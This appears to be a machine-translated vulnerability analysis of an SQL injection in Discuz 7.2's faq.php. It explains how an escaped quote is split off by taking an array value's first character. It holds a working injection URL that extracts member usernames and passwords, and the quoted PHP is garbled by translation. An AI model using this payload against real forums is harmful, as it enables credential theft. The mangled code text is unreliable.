Faq of Discuz7.2. php SQL injection vulnerability analysis, discuz7.2faq. php

Faq of Discuz7.2. php SQL injection vulnerability analysis, discuz7.2faq. php

Injection code example:
Copy codeThe Code is as follows:
Http://www.bkjia.com/faq.php? Action = grouppermission & gids [99] = % 27 & gids [100] [0] =) and (select 1 from (select count (*), concat (select concat (username, 0x20, password) from cdb_members limit 0, 1) from 'information _ scheme '. tables limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x) a) % 23

Vulnerability Analysis: by phithon

Copy codeThe Code is as follows:
($ Action = 'grouppermission '){

...
Ksort ($ gids );
$ Groupids = array ();
Foreach ($ gids as $ row ){
$ Groupids [] = $ row [0];
}

$ Query = $ db-> query ("SELECT * FROM {$ tablepre} usergroups u left join {$ tablepre} admingroups a ON u. groupid =. admingid WHERE u. groupid IN (". implodeids ($ groupids ). ")");
...
}
Function implodeids ($ array ){
If (! Empty ($ array )){
Return "'". implode ("', '", is_array ($ array )? $ Array: array ($ array ))."'";
} Else {
Return '';
}
}

Define an array groupids, traverse $ gids (this is also an array, that is, $ _ GET [gids]), and put the first of all values in the array in groupids.

Why does this operation cause injection?

Discuz will perform addslashes escaping on the GET array globally, that is to say, it will convert 'to \'. Therefore, if the input parameter is: gids [1] =, is converted to $ gids [1] = \ ', and the value assignment statement $ groupids [] = $ row [0] is equivalent to taking the first character of the string, that is, remove the escape characters.

Later, he processed the data with implodeids before placing it into an SQL statement. We can see the implodeids function.

A simple function is to split the $ groupids array with ',' to form a string similar to '1', '2', '3', and '4.

However, when an escape character is just obtained from our array, it will escape a normal escape character, for example:
'1', '\', '3', '4'
Is there any difference: 4th single quotes are escaped, that is, 5th single quotes and 3rd single quotes are closed.

How many discuz 72 Vulnerabilities

What are the vulnerabilities that have not been updated for a long time?
 
How to run php In the discuz72 Template

Go to the dz background, add a call, and enter the php code you want to run. After the code is generated, the call code you want will appear.